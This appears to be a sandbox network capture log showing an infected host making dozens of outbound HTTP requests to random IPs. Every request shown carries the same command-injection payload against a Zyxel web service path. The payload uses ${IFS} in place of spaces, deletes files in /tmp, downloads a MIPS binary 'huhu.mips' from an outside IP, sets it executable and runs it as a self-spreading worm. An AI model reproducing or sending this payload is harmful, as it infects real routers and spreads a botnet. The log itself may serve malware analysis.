                                              Jan 29, 2024 07:03:40.826502085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2242192.168.2.1444932154.182.87.153443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.826528072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2243192.168.2.1439662116.178.143.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.826586008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2244192.168.2.1458582115.184.123.233443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.826620102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2245192.168.2.143397612.173.84.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.826652050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2246192.168.2.143987471.210.99.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.826711893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2247192.168.2.1434212126.193.19.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.826741934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2248192.168.2.144269499.113.204.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.826781988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2249192.168.2.1453094211.211.103.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.826814890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2250192.168.2.1452262152.116.4.207443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.826853991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2251192.168.2.145054472.56.185.217443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.826879025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2252192.168.2.144803848.31.16.214443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.826925993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2253192.168.2.1454166149.84.174.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.826977968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2254192.168.2.1438262125.112.63.155443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.826998949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2255192.168.2.1452058216.111.197.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.827020884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2256192.168.2.146031687.46.252.49443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.827061892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2257192.168.2.144352023.113.57.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.827085972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2258192.168.2.1447548128.89.7.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.827120066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2259192.168.2.145060244.73.205.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.827162027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2260192.168.2.1444118153.99.185.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.827191114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2261192.168.2.144400444.8.96.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.827219963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2262192.168.2.143751040.226.76.24443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.827284098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2263192.168.2.1439496178.94.131.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.827313900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2264192.168.2.143606240.0.247.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.827363968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2265192.168.2.1452918110.189.47.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.827414989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2266192.168.2.1435966119.130.45.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.839050055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2267192.168.2.1459736178.49.168.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.839097023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2268192.168.2.145346842.212.29.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.839143991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2269192.168.2.1439972210.174.154.242443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.839183092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2270192.168.2.144727059.137.211.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.839224100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2271192.168.2.145373072.15.76.43443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.839255095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2272192.168.2.145298283.111.187.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.839293957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2273192.168.2.1442108135.199.79.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.839322090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2274192.168.2.1448162200.28.11.162443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.839359045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2275192.168.2.1449450126.183.233.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.839404106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2276192.168.2.143713483.96.91.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.839447021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2277192.168.2.1445804152.212.219.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.839471102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2278192.168.2.143919092.78.58.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.839500904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2279192.168.2.1442044150.226.124.229443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.839529991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2280192.168.2.145214885.234.187.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.839564085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2281192.168.2.1435842218.214.249.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.839612007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2282192.168.2.146069486.76.221.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.839642048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2283192.168.2.1458964135.188.231.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.839698076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2284192.168.2.1435694106.71.77.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.839726925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2285192.168.2.143595470.193.6.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.839761972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2286192.168.2.1457534120.210.145.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.839796066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2287192.168.2.145810853.86.143.229443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.839854956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2288192.168.2.1437660197.36.155.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.839879036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2289192.168.2.145425863.34.114.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.839937925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2290192.168.2.143980623.7.249.199443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.839970112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2291192.168.2.143826295.199.96.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.840003014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2292192.168.2.145276442.201.44.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.840020895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2293192.168.2.144641067.228.169.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.840054989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2294192.168.2.145270282.246.156.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.840104103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2295192.168.2.1456062193.199.125.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.840128899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2296192.168.2.145180692.12.222.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.840181112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2297192.168.2.14365188.90.51.181443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.840229988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2298192.168.2.1433314194.63.245.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.840281963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2299192.168.2.1460198185.200.141.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.840312004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2300192.168.2.1446992129.197.199.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.840349913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2301192.168.2.14480402.220.186.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.840398073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2302192.168.2.1449464189.189.140.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.840426922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2303192.168.2.144931052.5.193.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.840471983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2304192.168.2.1460378189.229.131.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:41.840506077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2305192.168.2.1447218133.0.195.59443
                                              TimestampBytes transferredDirectionData
